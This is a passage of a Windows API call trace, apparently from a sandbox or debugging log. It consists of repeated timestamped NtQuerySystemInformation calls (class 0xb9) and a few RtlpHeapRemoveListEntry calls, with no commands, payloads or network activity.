SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0241.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0241.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.217] RtlpHeapRemoveListEntry () [0241.221] RtlpHeapRemoveListEntry () [0241.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.267] RtlpHeapRemoveListEntry () [0241.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.274] RtlpHeapRemoveListEntry () [0241.277] RtlpHeapRemoveListEntry () [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.284] 